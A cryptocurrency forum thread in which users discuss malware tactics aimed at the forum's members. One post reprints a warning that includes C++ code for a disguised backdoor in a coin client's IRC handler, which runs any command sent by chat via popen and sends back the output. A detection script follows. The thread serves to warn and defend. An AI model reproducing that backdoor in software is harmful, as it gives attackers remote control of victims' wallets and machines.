bedford1972
Jr. Member
Offline
Activity: 266
Merit: 2
|
|
February 21, 2018, 10:39:50 PM |
|
Good post, very cognitive. But I would add here recommendations on how to minimize the risks of infection. For example, set up one computer for work on the network and a separate one for wallets. This will at least help keep safe the funds that are stored for a long time. I will also recommend using the Tabsbook program, in which you can save frequently used links and go only to them, since attackers often copy official resources and make phishing sites. There are a bunch of other recommendations that I advise you to study before you start working with cryptocurrency.
|
|
|
|
sportcoins
Newbie
Offline
Activity: 1
Merit: 0
|
|
February 23, 2018, 04:38:47 AM |
|
Thanks for the information. We hate Malware!
|
|
|
|
hashcoinusa
Member
Offline
Activity: 342
Merit: 10
|
|
February 26, 2018, 06:03:20 AM |
|
We will never have the insight into the code.
Don't install a wallet on your main computer. Create a virtual machine and limit your exposure.
|
|
|
|
robi5060
Newbie
Offline
Activity: 68
Merit: 0
|
|
February 26, 2018, 02:57:41 PM |
|
Can anyone please tell me which coins are affected by sophisticated attacks/malware?
|
|
|
|
Nanoverso
Jr. Member
Offline
Activity: 101
Merit: 3
|
|
February 26, 2018, 11:24:41 PM Last edit: May 16, 2019, 04:50:20 AM by Nanoverso |
|
Is there any information on whether these malware infection attempts are affecting other systems beyond Windows, like Mac or Linux?
|
|
|
|
Dandidada
Newbie
Offline
Activity: 2
Merit: 0
|
|
February 28, 2018, 08:18:18 AM |
|
Thank y'all for the enlightenment.. it's very much appreciated, knowing full well there are lots of hackers trying to get easy cryptocurrency.
|
|
|
|
prsharma
Newbie
Offline
Activity: 33
Merit: 0
|
|
February 28, 2018, 09:54:48 AM |
|
Very useful information for me. I never thought that attackers might attack this forum and post malicious content here. Thanks for the info, I will be cautious about content and links before clicking on them.
|
|
|
|
Motookerva
Newbie
Offline
Activity: 63
Merit: 0
|
|
March 01, 2018, 06:46:55 PM |
|
I am a newbie and thanks for informing. I would like to ask, how can we spot a scammer?
|
|
|
|
Marble777
Member
Offline
Activity: 736
Merit: 11
|
|
March 01, 2018, 10:12:06 PM |
|
Very useful information for me. I never thought that attackers might attack this forum and post malicious content here. Thanks for the info, I will be cautious about content and links before clicking on them.
It applies to me too, because I am a beginner, so I do not understand this forum and sometimes feel paranoid when I hear there are many cases of phishing, but after reading the above information I really understand and am sure that this forum is safe from hackers.
|
|
|
|
seggardinggins
|
|
March 02, 2018, 09:34:02 PM |
|
Would running each wallet/miner in a different virtual machine with virtualbox prevent the effects of this kind of malware?
Maybe so, but the tools should as much as possible be used only for this purpose. In my opinion it would be too risky if the tool we use to open the wallet is also used for other purposes such as games and downloading mp3s or videos, because we all know there is a lot of malware in most download links.
|
|
|
|
jaydoes6
Newbie
Offline
Activity: 24
Merit: 0
|
|
March 03, 2018, 05:32:27 AM |
|
Can't you give anything new? This has been prevailing since very old times in btcs.
|
|
|
|
gng
Newbie
Offline
Activity: 210
Merit: 0
|
|
March 03, 2018, 07:56:14 AM |
|
You think faucet sites send malware?
|
|
|
|
AutumnSphinx
Newbie
Offline
Activity: 4
Merit: 0
|
|
March 03, 2018, 11:18:29 PM |
|
This is very informative especially to newbies like me. Thank you. Reading all the threads. I need to add security measures.
|
|
|
|
Ant112990
Newbie
Offline
Activity: 21
Merit: 0
|
|
March 04, 2018, 04:29:50 AM |
|
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.

Here is the relevant source code:

    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) {
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            CFree(buf);
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
        }
    }

Here is the source code with macros resolved:

    if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) {
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            pclose(buf);
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
        }
    }

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Don't forget airship registration, asking for private keys.. I sent them money and luckily found out immediately after I sent it.. and moved my coin out of the wallet and created a new wallet.
|
|
|
|
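An added example (not code from the original post or from the coin's source): a small Python audit pass that resolves object-like `#define` aliases and reports calls that end up at a process-spawning function, which is how the `CRead` to `popen` backdoor quoted in the post above was hidden. The `#define` lines in the sample are constructed from the macro-resolved version shown in the post; the function names and the risky-call list are assumptions.

```python
import re

# Process-spawning functions a wallet's IRC/bootstrap code has no reason to call (assumed list).
RISKY_CALLS = {"popen", "_popen", "system", "execl", "execlp", "execv", "execvp",
               "CreateProcessA", "CreateProcessW", "ShellExecuteA", "WinExec"}
# Object-like macros only: "#define NAME replacement" (function-like macros are skipped).
DEFINE_RE = re.compile(r"^[ \t]*#[ \t]*define[ \t]+(\w+)[ \t]+(.+?)[ \t]*$", re.M)
CALL_RE = re.compile(r"\b([A-Za-z_]\w*)\s*\(")

# Constructed sample: the defines are inferred from the resolved code in the post.
SAMPLE = '''\
#define CBuff "PRIVMSG"
#define CLine FILE
#define CRead popen
#define CFree pclose
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1) {
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    CFree(buf);
}
'''

def resolve(token, aliases, depth=8):
    """Follow alias chains (A -> B -> popen); the depth limit guards against cycles."""
    while depth and token in aliases:
        token = aliases[token]
        depth -= 1
    return token

def find_hidden_calls(source):
    """Return (line_no, name_as_written, resolved_name) for every risky call."""
    aliases = dict(DEFINE_RE.findall(source))
    findings = []
    for line_no, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # the preprocessor lines themselves are not call sites
        for written in CALL_RE.findall(line):
            resolved = resolve(written, aliases)
            if resolved in RISKY_CALLS:
                findings.append((line_no, written, resolved))
    return findings

if __name__ == "__main__":
    for line_no, written, resolved in find_hidden_calls(SAMPLE):
        print(f"line {line_no}: {written}() resolves to {resolved}()")
```

The scan is textual, so it also reports matches inside comments and string literals; treat each hit as a line to read, not a verdict.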
bekhuong45
Newbie
Offline
Activity: 126
Merit: 0
|
|
March 04, 2018, 10:32:03 AM |
|
We need to say thanks to you.. ) clap clap
|
|
|
|
Magister Magus
Member
Offline
Activity: 328
Merit: 39
|
|
March 04, 2018, 10:44:19 AM |
|
Thank you very much for your precious info; I'm really stunned, as I never thought there were so many ways to be scammed. Your post made me think in a paranoid way, and I just wondered if we can really trust antimalware software: how can we be sure that THEY don't put something malicious in, or don't scan for private keys? It seems that we are really in an electronic far west, and probably the next big battle will be in the field of security.
|
|
|
|
rammanbl4
|
|
March 04, 2018, 03:35:43 PM |
|
This is terrible. I really thank you, because I almost got caught, and now I am starting to install Adblock. I hope to block all the malware from online websites.
|
|
|
|
redshiftexpensive
Newbie
Offline
Activity: 69
Merit: 0
|
|
March 05, 2018, 03:11:51 AM |
|
Yes I was totally aware of it
|
|
|
|
cp3mc
Newbie
Offline
Activity: 34
Merit: 0
|
|
March 05, 2018, 11:19:46 AM |
|
I was wondering if there is a way to automatically delete any malware link post on this forum, so that we may not even get to open the link.
|
|
|
|
superresistant
Legendary
Offline
Activity: 2156
Merit: 1131
|
|
March 06, 2018, 02:48:33 PM |
|
I was wondering if there is a way to automatically delete any malware link post on this forum, so that we may not even get to open the link.
You can't detect whether a URL is malicious or not. Either all URLs are banned or people are very careful.
|
|
|
|
|